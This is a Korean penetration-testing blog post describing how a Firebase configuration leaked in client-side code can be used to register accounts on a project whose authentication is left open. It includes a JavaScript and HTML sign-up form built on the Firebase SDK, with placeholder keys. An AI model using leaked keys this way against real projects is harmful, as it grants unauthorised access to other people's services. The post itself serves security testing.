| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 채팅환전사기
- NUGU
- decrypt
- sha256
- encrypt
- Malware Sample
- md5
- 모의해킹
- esbuild
- XSS
- Craco
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- 로맨스스캠
- 사진도용
- aes
- 취약점
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- ssrf
- hash
- 스캠
- 많다..
- CryptoJS
- self-signed
- open redirect
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- 변태는
- speed-measure-webpack-plugin
- https
- react
- shell_gpt
Archives
- Today
- Total
annyoung
firebase exploit with firebase keys 본문
//company data
var firebaseConfig = {
apiKey: "your_domain_key",
authDomain: "your_domain.firebaseapp.com",
databaseURL: "https://your_domain.firebaseio.com",
projectId: "your_domain-stage",
storageBucket: "your_domain.appspot.com",
messagingSenderId: "123456789012",
appId: "1:53234*****:web:23c8b288e919a*********",
};
// Initialize Firebase
firebase.initializeApp(firebaseConfig);
const auth = firebase.auth();
function signUp() {
var email = document.getElementById("email");
var password = document.getElementById("password");
const promise = auth.createUserWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
alert("Signed Up");
}
function signIn() {
var email = document.getElementById("email");
var password = document.getElementById("password");
const promise = auth.signInWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
}
function signOut() {
auth.signOut();
alert("Signed Out");
}
auth.onAuthStateChanged(function(user) {
if (user) {
var email = user.email;
alert("Active User " + email);
//Take user to a different or home page
//is signed in
} else {
alert("No Active User");
//no user is signed in
}
});<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Form</title>
<link rel="stylesheet" href="">
<!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/7.18.0/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/7.18.0/firebase-auth.js"></script>
<script src="form.js"></script>
</head>
<body>
<h1>Form</h1>
<div id="fornContainer">
<div id="header"></div>
<input type="email" placeholder="email" id="email">
<input type="password" placeholder="password" id="password">
<button onclick="signUp()" id="signUp">Sign Up</button>
<button onclick="signIn()" id="signIn">Sign In</button>
<button onclick="signOut()" id="signUp">Sign Out</button>
</body>
클라이언트에 누출되는 firebaseConfig을 가지고 firebase 프로젝트에 계정을 추가할 수 있다.
물론, authentication 관련 설정을 해놓지 않은 경우만 가능한 것으로 보인다.
출처: https://vinay7751.medium.com/firebase-key-leak-and-how-to-exploit-firebase-keys-61b1e4057119
Firebase key leak and How to exploit firebase keys
Hello Hunters, I am going to share a vulnerability that I found very recently. I cannot disclose the website name so I will mention it as…
vinay7751.medium.com
'모의해킹' 카테고리의 다른 글
| SSRF port scan (0) | 2022.12.09 |
|---|---|
| js source map file (0) | 2022.12.02 |
| 모의해킹 시 해시(hash)에 대해 (0) | 2022.11.22 |
| Deeplink webview hijacking 취약점 분석 (0) | 2022.09.21 |
| Overriding getter and setter on document.cookie (0) | 2022.08.23 |
'모의해킹' Related Articles
more
Comments